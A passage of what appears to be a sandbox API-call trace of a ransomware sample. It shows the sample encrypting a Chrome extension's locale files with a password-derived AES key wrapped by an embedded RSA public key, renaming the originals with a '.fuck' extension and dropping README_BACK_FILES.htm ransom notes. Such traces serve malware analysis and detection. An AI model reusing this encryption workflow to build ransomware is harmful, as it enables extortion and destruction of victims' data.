Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\messages.json"), bFailIfExists=0) returned 1 [0256.966] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json", dwFileAttributes=0x0) returned 1 [0256.966] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\messages.json.gsg")) returned 1 [0256.967] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\messages.json.fuck")) returned 1 [0256.969] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.969] CryptDestroyKey (hKey=0x2e19828) returned 1 [0256.969] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0256.969] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.969] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.970] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\readme_back_files.htm")) returned 0xffffffff [0256.970] AreFileApisANSI () returned 1 [0256.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0256.970] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.970] GetFileType (hFile=0x5d50) returned 0x1 [0256.970] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.971] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.971] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.972] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.972] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.972] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.972] GetLastError () returned 0x0 [0256.972] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json")) returned 0x20 [0256.972] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json", dwFileAttributes=0x80) returned 1 [0256.972] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.973] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.974] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.975] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0256.977] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.977] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.977] CryptHashData (hHash=0x2e18128, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.977] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0256.977] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.977] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.977] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e14d30) returned 1 [0256.977] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14d30, dwCertEncodingType=0x1, pInfo=0x2e2bb70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2bba0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2bba8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e199a8) returned 1 [0256.977] CryptEncrypt (in: hKey=0x2e199a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.977] CryptEncrypt (in: hKey=0x2e199a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15280*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15280*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.978] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e15280*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15280*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.979] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xcc, lpOverlapped=0x0) returned 1 [0256.980] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xcc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0256.980] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0256.980] CloseHandle (hObject=0x5d60) returned 1 [0256.980] CloseHandle (hObject=0x5d5c) returned 1 [0256.980] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json"), bFailIfExists=0) returned 1 [0256.983] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json", dwFileAttributes=0x0) returned 1 [0256.984] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json.gsg")) returned 1 [0256.985] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\messages.json.fuck")) returned 1 [0256.986] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.986] CryptDestroyKey (hKey=0x2e19828) returned 1 [0256.986] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0256.986] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.986] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.986] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\readme_back_files.htm")) returned 0xffffffff [0256.986] AreFileApisANSI () returned 1 [0256.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.986] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.987] GetFileType (hFile=0x5d50) returned 0x1 [0256.987] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.988] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.988] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.988] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.989] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.989] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.989] GetLastError () returned 0x0 [0256.989] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json")) returned 0x20 [0256.989] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json", dwFileAttributes=0x80) returned 1 [0256.989] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.990] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.990] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.991] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0256.993] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.993] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.993] CryptHashData (hHash=0x2e18128, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.993] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0256.993] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.993] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.993] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e14758) returned 1 [0256.993] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14758, dwCertEncodingType=0x1, pInfo=0x2e2b350*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b380*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b388*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19b68) returned 1 [0256.994] CryptEncrypt (in: hKey=0x2e19b68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.994] CryptEncrypt (in: hKey=0x2e19b68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14b98*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e14b98*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.994] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e14b98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e14b98*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.995] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xe3, lpOverlapped=0x0) returned 1 [0256.996] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe3, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0256.996] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0256.996] CloseHandle (hObject=0x5d5c) returned 1 [0256.996] CloseHandle (hObject=0x5d60) returned 1 [0256.996] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json"), bFailIfExists=0) returned 1 [0256.999] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json", dwFileAttributes=0x0) returned 1 [0256.999] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json.gsg")) returned 1 [0257.000] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\messages.json.fuck")) returned 1 [0257.001] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.001] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.001] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.001] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.001] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.001] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\readme_back_files.htm")) returned 0xffffffff [0257.001] AreFileApisANSI () returned 1 [0257.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0257.001] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 